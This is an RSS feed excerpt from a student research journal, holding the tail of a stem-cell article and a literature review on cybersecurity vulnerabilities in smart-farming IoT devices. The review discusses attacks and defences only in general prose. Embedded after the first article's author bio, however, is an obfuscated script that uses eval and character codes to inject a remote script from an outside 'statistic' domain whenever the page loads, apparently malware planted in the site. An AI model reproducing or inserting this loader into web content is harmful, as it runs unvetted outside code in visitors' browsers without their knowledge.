<p>Smith AS, Macadangdang J, Leung W, Laflamme MA, Kim DH. Human iPSC-derived cardiomyocytes and tissue engineering strategies for disease modeling and drug screening. Biotechnol Adv. 2017 Jan-Feb;35(1):77-94.</p>



<p>Tompkins BA, Balkan W, Winkler J, Gyöngyösi M, Goliasch G, Fernández-Avilés F, Hare JM. Preclinical Studies of Stem Cell Therapy for Heart Disease. Circ Res. 2018 Mar 30;122(7):1006-1020.</p>



<p>Tweedell KS. The Adaptability of Somatic Stem Cells: A Review. J Stem Cells Regen Med. 2017 May 30;13(1):3-13</p>



<p>Ye L, Swingen C, Zhang J. Induced pluripotent stem cells and their potential for basic and clinical sciences. Curr Cardiol Rev. 2013 Feb 1;9(1):63-72.</p>



<p>Yoshida Y, Yamanaka S. Induced Pluripotent Stem Cells 10 Years Later: For Cardiac Applications. Circ Res. 2017 Jun 9;120(12):1958-1968.</p>



<p>Zhao Y, Rafatian N, Wang EY, Wu Q, Lai BFL, Lu RX, Savoji H, Radisic M. Towards chamber specific heart-on-a-chip for drug testing applications. Adv Drug Deliv Rev. 2020;165-166:60-76.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084.jpeg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Rishya Gutti</h5><p>Rishya is a junior at Neuqua Valley High School. She is interested in biological sciences and is an aspiring medical student. Research programs like RISE (Research, Inquiry Skills &amp; Experimentation) have equipped Rishya with necessary skills to conduct independent research. She is a third degree black belt in Taekwondo and has won several national titles in her age group. Rishya enjoys volunteering her time to teach mathematics to younger students and to promote mental health awareness through a non-profit organization. In her free time, you will find her reading, working out, or watching her favorite tv shows.
</p></figure></div>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/using-induced-pluripotent-stem-cells-for-tissue-regeneration-in-cardiovascular-diseases/">Using induced pluripotent stem cells for tissue regeneration in cardiovascular diseases</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>An Overview of Vulnerabilities in Smart Farming Systems</title>
		<link>https://exploratiojournal.com/an-overview-of-vulnerabilities-in-smart-farming-systems/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=an-overview-of-vulnerabilities-in-smart-farming-systems</link>
		
		<dc:creator><![CDATA[Tejaswi Koduru]]></dc:creator>
		<pubDate>Sun, 23 Jan 2022 13:13:33 +0000</pubDate>
				<category><![CDATA[Biology]]></category>
		<category><![CDATA[Scientific]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1502</guid>

					<description><![CDATA[<p>Tejaswi Koduru<br />
Thomas Jefferson High School for Science and Technology</p>
<p>The post <a href="https://exploratiojournal.com/an-overview-of-vulnerabilities-in-smart-farming-systems/">An Overview of Vulnerabilities in Smart Farming Systems</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Tejaswi Koduru</strong><br><em>Thomas Jefferson High School for Science and Technology</em></p>
</div></div>



<h2 class="wp-block-heading"><strong>Introduction</strong></h2>



<p>According to the 2020 report of the United Nations Food and Agriculture Organization, the decades-long decrease in the prevalence of undernourishment (PoU) across the world has come to an end. In 2019, it was reported that globally, nearly 690 million people (8.9% of the world population) were undernourished. Between 2018 and 2019, the PoU increased by 0.3%, equivalent to 10 million people. [1] While a multitude of reasons are behind the rapid increase in PoU, it is agreed that human-caused climate change, world conflicts, increased urbanization, and lower global biodiversity are all major causes. As the world population expands to 9.4 billion in the coming decades, the problem of food production will be even more important [3].&nbsp;</p>



<p>Food production systems (FPSs) come in a variety of forms depending on their location. In developing countries, FPSs are fragmented into multiple interconnected systems and depend on smaller-scale farming operations (SSFOs). SSFOs are generally much less efficient than their larger counterparts. Addressing these inefficiencies is key to improving FPSs in developing regions. The most obvious solution is to integrate sophisticated modern agricultural practices into SSFOs; However, these practices are difficult to implement as a result of the low literacy rates of farmers in developing countries. [4] Another option is to integrate machines into farms, to automate several key processes. The combination of machines, sensors, and human oversight is known as smart farming.&nbsp;</p>



<p>Smart farming is a new type of agricultural management utilizing various techniques to increase farm yield. Smart farming may enable us to overcome challenges related to food production demands caused by a growing population. Technologies used in smart farms vary greatly, ranging from automated weather data collectors to Unmanned Aerial Vehicles (UAVs) designed to gather topological data or water crops [2]. Interconnected devices such as those on smart farms are collectively known as the Internet of Things (IoT). Within an IoT system, data from sensors actively change the conditions in which plants are grown, resulting in increased overall productivity. For instance, an IoT system might increase water distribution to plants in the event of a drought. Within the USA, the use of IoT devices in smart farms results, on average, in a 163 dollars/day per hectare increase in farm yield. In fact, this number could even be as high as 272 dollars depending on the type of crop [5].&nbsp;</p>



<p>While IoT devices used in smart farms are specialized for a variety of tasks, including watering crops and gathering environmental data, they are comparable to regular IoT devices in several areas.&nbsp; Previous studies have demonstrated vulnerabilities in IoT devices to cyberattacks (Distributed Denial of Service, Man in the Middle attacks, etc.) [6] Should these vulnerabilities be exploited, a smart farm stands to lose its entire crop, leading to widespread food shortage. Thus, addressing vulnerabilities in smart farming systems is of the utmost importance.&nbsp;</p>



<p>On April 9th, 2021, the Colonial Pipeline, which transports a significant percentage of fuel for the Eastern Coast of the United States, was involved in a ransomware attack. While the ransomware was eventually removed, the shutdown of the pipeline impacted millions of consumers across the US. A similar attack on smart farms could have an even more devastating impact, as the food shortage may lead to widespread famine. In Virginia, the agricultural industry has an economic impact of approximately 70 billion dollars and is responsible for 334,000 jobs. When combined with value-added industries (Which rely on agriculture), the agricultural industry makes up nearly 10% of the state’s GDP. [7] Any disruption in the agricultural output of the state would cascade into millions of dollars worth of damage. In addition, thousands would lose their jobs leading to wide-scale unemployment. Virginia is currently building a network of smart farms through the SmartFarm Innovation Network project. As Virginia’s agriculture begins to depend more heavily on smart farming, the poor cybersecurity protocols of these farms become more of a concern.&nbsp;</p>



<p>The aim of this literature review is to provide a brief but extensive overview of smart farming technology and potential cybersecurity vulnerabilities present in smart farms. In addition, this literature review will also suggest possible avenues to improve the security of smart farms. This document is organized as follows: Section 2 will provide a more in-depth overview of the types of IoT devices on smart farms. Section 3 will examine the potential security pitfalls present in these devices. Section 4 will provide techniques to mitigate these security risks. Finally, Section 5 will conclude the paper.&nbsp;</p>



<h2 class="wp-block-heading"><strong>Section 2</strong></h2>



<p>The role of IoT and smart technology in the agricultural industry has steadily increased over the past few decades [8]. IoT-based agricultural systems are able to be more efficient than their traditional counterparts due to a variety of reasons. In most cases, this is due to smart sensors which relay information about soil and atmospheric conditions. However, IoT technology has many more applications within a smart farm. IoT devices are routinely used for rainfall monitoring, soil nutrition management, water management, pest infection management, and crop health monitoring [9].</p>



<h4 class="wp-block-heading"><strong>Section 2.1 &#8211; Soil IoT</strong></h4>



<p><strong></strong>While IoT sensors on farms vary in their uses, a majority of sensors are used to measure soil conditions on the farm. Several companies offer IoT solutions that are used to identify key soil factors such as texture, water-holding capacity, and absorption rate. Knowing this information allows farmers to stop soil erosion, densification, salinization, acidification, and pollution, which can otherwise cause thousands of dollars in damages. AgroCeres, a company specializing in IoT solutions for the agricultural industry, has released a product known as&nbsp; Lab-In-A-Box. Lab-In-A-Box allows farmers to conduct hundreds of soil tests without formal training, miles away from a traditional farm. Farmers can then act on this information to improve their soil quality, resulting in a better harvest [10]. Monnit, another IoT company, provides wireless soil sensors able to connect to a central system. Data from Monnit sensors can be used in conjunction with smart pumps to actively change the amount of water given to plants based on soil moisture.&nbsp;</p>



<h4 class="wp-block-heading"><strong>Section 2.2 &#8211;&nbsp; Weather IoT</strong></h4>



<p><strong></strong>The amount and timing of rainfall is arguably the most important factor affecting a farm’s productivity. Fluctuations in weekly or monthly rainfall levels can have a drastic impact on agricultural productivity and revenue. Therefore, predicting future weather patterns using large datasets of previous weather patterns is key to improving farm efficiency [11]. Unmanned Aerial Vehicles (UAVs) are being used for a variety of reasons in smart farms. One particularly interesting application of UAVs is to collect weather data. After collection, the data is stored on cloud servers. Next, the data can be drawn from these servers and is used for a variety of purposes. Researchers in [12] proposed a method to create a genetic algorithm (GA) to predict future weather patterns based on old data. When new data is collected by UAVs, it is fed into the GA to determine if plants need water. A sensor system is also used to check the results of the GA. Should moisture levels fall below a critical threshold, smart pumps are used to provide additional water to plants.&nbsp;</p>



<h4 class="wp-block-heading"><strong>Section 2.3 &#8211; Water IoT</strong></h4>



<p><strong></strong>Proper irrigation systems are an essential element in any farm. Improper distribution of water to plants, caused by a malfunctioning irrigation system, may lead to widespread crop failure. Global warming further contributes to this problem, by making water scarcer in certain regions. Therefore, identifying and solving problems in irrigation systems is of the utmost importance. IoT devices can be used to automate the process of irrigation, minimizing the risk of catastrophic failures. IoT irrigation systems come in several forms, from simple Arduino-based systems to those which implement AI technology [14]. However, in most systems, there are several key features. First, a power source is used to power the system. In most cases, this takes the form of a solar panel, but there are exceptions to this rule. Most notably, Arduino-based systems are normally powered by a combination of batteries and solar power [15]. Next, a central controller is used to obtain data regarding the environment. Should the data indicate that certain environmental variables do not fall within certain parameters, the central controller actively changes these variables through the use of smart pumps [16]. IoT systems are capable of independently performing this process multiple times a day, thereby reducing the risk of failures in irrigation systems normally caused by human error.&nbsp;</p>



<h4 class="wp-block-heading"><strong>Section 2.4 &#8211; Pest IoT</strong></h4>



<p>The productivity of several key plant species necessary for humans, such as wheat, maize, and cotton, can be severely impacted by the presence of pests. One study found that the global potential loss of crops due to pests varied from roughly 50% in wheat to more than 80% in cotton [18]. A wide variety of pesticides are used to combat this problem. However, excessive use of pesticides can damage the local environment, aid in the development of pesticide-resistant crops, and lead to several health conditions in farmers [19]. While the use of IoT in regards to pest control is limited when compared to its other uses, several studies have created potential IoT systems to deal with pest infections. Researchers at the National Taiwan University designed an IoT-based system designed to identify pest insects throughout a farm. The resulting spatial-temporal information was then used to kill these pests [20]. Another study by the Brazillian National Institute of Telecommunications expanded on this research by designing a trap that would both identify and exterminate pests. A computer vision algorithm was used to identify pests, based on images taken from an embedded system containing a camera, a GPS sensor, and motor actuators. Should the computer vision algorithm indicate that pests are present in the trap, the trap immediately kills them. [21] The potential of IoT systems in pest management is great. IoT systems may promise to reduce the amount of pesticide required to eliminate pests, thereby reducing risks to farmers while simultaneously saving large sums of money.&nbsp;</p>



<p>As shown above, IoT devices and systems are applied in a variety of forms throughout smart farms. While not all smart farms may contain all such devices, the presence of at least one of these systems greatly increases the farm’s efficiency. However, one notable downside to intelligent IoT systems is their vulnerability to cyberattacks. Previous studies have demonstrated the ease with which bad actors are able to infiltrate IoT systems. As mentioned earlier, a malicious attack on a smart farm may have severe economic impacts due to the importance of the agricultural industry to statewide and nationwide GDP. Therefore, we will next examine the potential cybersecurity risks present in smart farm IoT systems.</p>



<h2 class="wp-block-heading"><strong>Section 3</strong></h2>



<p>The rapid integration of IoT technology in various industries brings with it new risks in the form of novel security challenges. According to&nbsp; Tawalbeh et al. (2020), improper device updates, lack of efficient and robust security protocols, user unawareness, and famous active device monitoring are among the challenges that IoT is facing. These vulnerabilities are present in not only household IoT devices, but also in smart farming systems. Attacks that take advantage of these vulnerabilities may lead to serious disruptions in the farm environment, depending on which system is breached. Attacks on smart farming systems generally fall into one of two categories: Physical, where farm machinery is disrupted, or online, where farm data is modified or deleted. The following subsections will further elaborate on these vulnerabilities. We will also examine several case studies demonstrating the effects of a successful attack on IoT systems.&nbsp;</p>



<h4 class="wp-block-heading"><strong>Section 3.1 &#8211; Physical Attacks</strong></h4>



<p>According to [23], the number of farm workers has steadily declined in the 20th century, while farm production has increased. The increased use of machinery is the cause of this discrepancy. Machinery is used for several purposes within a farm. Primary and secondary tilling of soil, harvesting, pest control, and erosion control are just some of the many applications of heavy machinery. Light machinery, on the other hand, primarily consists of drones, UAVs, and automated farm robots, and is primarily used for environmental data collection. Both heavy and light machinery can connect to IoT systems, although IoT-connected light machinery is more common.&nbsp;</p>



<p>Previous studies have demonstrated several methods used by bad actors to wirelessly take control of a drone. This concern is further exacerbated as tutorials on how to take control of a drone are available on numerous video-sharing platforms, including YouTube [24]. A study published in the Internet of Things journal [25] found that major vulnerabilities were present in a majority of light machinery products. A summary of several of these vulnerabilities, as stated in the study, is presented below.</p>



<ol class="wp-block-list"><li>Spoofing/ Data Interference<ol><li>Data streamed from a drone to a central controller can be intercepted and modified. Telemetry data, crucial to maintaining the correct flight profile of a drone, is normally unencrypted. Several experiments have demonstrated the ease with which this vulnerability can be exploited, giving bad actors full control of the drone [26][27].&nbsp;</li></ol></li><li>Malware Infection<ol><li>Many UAVs contain software which allow pilots to fly them from various mobile platforms . This software can be used by bad actors to inject malware payloads into the UAVs memory or the ground station itself [28]. The malware used in such an attack may vary; However, in most situations, it enables bad actors to take full control of a UAV.&nbsp;</li></ol></li></ol>



<ol class="wp-block-list"><li>Prone to Wi-Fi Jamming<ol><li>A specific type of Distributed Denial of Service (DDoS) attack called a deauthentication attack can be performed on a UAV. Next, a bad actor may jam the UAVs intended frequency and connect it to their own. Such an attack only requires a raspberry pi to execute.</li></ol></li></ol>



<p>Vulnerabilities present in light machinery are different from those present in heavy machinery. While less common, IoT-connected heavy machinery still has a multitude of vulnerabilities which can be exploited by bad actors. The types of heavy machinery varies greatly on a farm. A brief overview of the types of heavy machinery commonly found on a farm is below. The IoT capability of each machine is also listed.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1-968x1024.png" alt="" class="wp-image-1504" width="592" height="626" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1-968x1024.png 968w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1-284x300.png 284w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1-768x812.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1-920x973.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1-230x243.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1-350x370.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1-480x508.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.13.48-PM-1.png 1214w" sizes="(max-width: 592px) 100vw, 592px" /></figure>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM-1024x1002.png" alt="" class="wp-image-1505" width="582" height="569" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM-1024x1002.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM-300x293.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM-768x751.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM-920x900.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM-230x225.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM-350x342.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM-480x470.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.14.15-PM.png 1190w" sizes="(max-width: 582px) 100vw, 582px" /></figure>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM-1024x505.png" alt="" class="wp-image-1506" width="585" height="288" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM-1024x505.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM-300x148.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM-768x379.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM-920x454.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM-230x113.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM-350x173.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM-480x237.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.15.54-PM.png 1196w" sizes="(max-width: 585px) 100vw, 585px" /><figcaption><br><em>General information gathered from [29], [30].&nbsp;</em></figcaption></figure>



<p>As shown above, IoT is being used to advance the capabilities of several types of heavy machinery used on farms. Notably, the machinery itself is not the target of the attack. The IoT systems used on the machinery to collect data is the primary attack vector. The consequences of a disruption of heavy machinery are varied:</p>



<ul class="wp-block-list"><li>Crop failure due to more or less water applied than needed (See 6th entry in table)</li><li>Crop failure due to improper application of fertilizer due to incorrect data provided by IoT sensors (See 5th entry in table)</li><li>Crop/Livestock loss during transport (See 4th entry in table)</li><li>Failure to plant crops properly should a farm use automated seeding robots (See 3rd entry in table)</li><li>Crop failure as a result of improper pesticide/herbicide application (See 2nd entry in table)</li></ul>



<p>The disruption of heavy machinery through cyberattacks can have a large impact on a farm’s productivity. However, it pales in comparison to a similar attack on online assets such as IoT sensor data.</p>



<h4 class="wp-block-heading"><strong>Section 3.2 &#8211; Online Attacks</strong></h4>



<p><strong></strong>Smart farms rely heavily on data collected by intelligent, IoT-connected sensors. Environmental data collected from these sensors is used to dictate the actions of other IoT-connected devices, such as smart pumps or sprayers. The following diagram illustrates an example of this relationship:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/image-1.png" alt="" class="wp-image-1507" width="586" height="254" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/image-1.png 995w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-1-300x131.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-1-768x334.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-1-920x400.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-1-230x100.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-1-350x152.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-1-480x209.png 480w" sizes="(max-width: 586px) 100vw, 586px" /></figure>



<p>If the weather sensor, pump, or the data transferred between the devices is compromised, bad actors will have the capability of controlling the amount of water given to plants. The effects of such a compromise are disastrous: A bad actor may stop pumping water to plants while editing data to make it seem like plants are watered, leading to widespread crop failure within a matter of days. While this situation may be averted through human oversight, several smart farms proposals include little to none human supervision [[35], [36]].&nbsp;</p>



<p>Breaching an IoT system has been shown to be possible in a number of studies. While IoT devices designed for smart farms and IoT devices designed for private households have different uses, their vulnerabilities are similar. According to a paper by the Bulgarian Academy of Sciences [37] , an attack on an IoT system can be split into the following parts:</p>



<ol class="wp-block-list"><li>Reconnaissance &#8211; Attackers spend months researching their target, using multiple online sources. Attackers may not need to directly interact with the target during this phase.&nbsp;</li><li>Searching for Vulnerabilities &#8211; After reconnaissance yields enough data to satisfy the attackers, they move on to the second phase. This phase primarily consists of identifying vulnerabilities in the target system.&nbsp;</li><li>Attack &#8211; During this phase, attackers launch their attack based on target vulnerabilities identified in step 2. In several cases, a malicious payload is inserted into the target, allowing attackers to gain access to confidential data or giving them control of key systems. We provide an overview of various attack strategies below.&nbsp;</li><li>Achieve/Maintain access &#8211; Once attackers gain control of a system, they must also ensure that their access remains in place. To this end, they cover up evidence of a breach or attack other devices connected to the primary attack vector. The longer a breach is maintained, the more information that attackers can exfiltrate.&nbsp;</li></ol>



<p>Attack strategies used by cybercriminals are ever changing. One research study [9] contains a detailed list of all major attack strategies used by cybercriminals to attack IoT criminals. Below is a summarized version of their findings, including only the most common attacks. However, we suggest visiting the source for more information if you are so inclined.&nbsp;</p>



<p></p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM-1024x613.png" alt="" class="wp-image-1508" width="577" height="345" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM-1024x613.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM-300x180.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM-768x460.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM-920x551.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM-230x138.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM-350x210.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM-480x288.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.28-PM.png 1212w" sizes="(max-width: 577px) 100vw, 577px" /></figure>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM-1024x425.png" alt="" class="wp-image-1509" width="578" height="239" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM-1024x425.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM-300x125.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM-768x319.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM-920x382.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM-230x95.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM-350x145.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM-480x199.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.18.43-PM.png 1200w" sizes="(max-width: 578px) 100vw, 578px" /></figure>



<p>With the number of attacks possible on both physical and online assets of a smart farm, properly identifying vulnerabilities in IoT systems is crucial to maintaining security. In the next section, we will discuss possible avenues towards protecting key IoT systems on smart farms.</p>



<h2 class="wp-block-heading"><strong>Section 4</strong></h2>



<p>We have identified several key cybersecurity vulnerabilities present in smart farming systems in section 3. However, even more important is the security measures needed to patch these vulnerabilities and ensure the security of IoT systems. To this end, a list of several of the more potent vulnerabilities and methods that can be used to fix them is presented below. The following chart is not an exhaustive list of all cybersecurity vulnerabilities in IoT systems. Rather, it will address the vulnerabilities presented in the previous chart (Within section 3). A more thorough analysis is presented in Appendix A.&nbsp;</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM-776x1024.png" alt="" class="wp-image-1510" width="597" height="788" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM-776x1024.png 776w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM-227x300.png 227w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM-768x1013.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM-920x1214.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM-230x303.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM-350x462.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM-480x633.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.27-PM.png 964w" sizes="(max-width: 597px) 100vw, 597px" /></figure>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM-807x1024.png" alt="" class="wp-image-1511" width="614" height="779" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM-807x1024.png 807w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM-237x300.png 237w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM-768x974.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM-920x1167.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM-230x292.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM-350x444.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM-480x609.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.20.59-PM.png 976w" sizes="(max-width: 614px) 100vw, 614px" /></figure>



<h2 class="wp-block-heading"><strong>Section 5</strong></h2>



<p><strong></strong>This paper is intended to provide an overview of smart farming, IoT devices used on smart farms, and potential vulnerabilities present in these IoT systems. The findings presented in this paper demonstrate that while IoT solutions may lead to an immense increase in agricultural production, they come with severe security risks. Bad actors may be able to diminish or even destroy the food supply of a country by leveraging vulnerabilities in smart farming IoT systems.&nbsp;</p>



<p>IoT devices are not only present in agriculture. They play essential roles in a variety of industries, and can also be found in private residences. Several research studies have demonstrated the vulnerabilities in these IoT systems by breaking into them. However, as of yet, no similar study has been conducted to examine issues with smart farming IoT systems. Further research, therefore, is crucial to preventing cyberattacks on smart farming facilities. As the world population continues to increase, and as smart farming plays an ever increasing role in meeting food demands, identifying and addressing vulnerabilities in smart farming IoT systems becomes more important than ever.&nbsp;</p>



<h2 class="wp-block-heading"><strong>Appendix A</strong></h2>



<p>The following chart expands on the vulnerabilities and solutions discussed in section 3 and 4. While these types of cyberattacks are not as common, knowing their effects and how to stop them is still valuable information to protect IoT systems.</p>



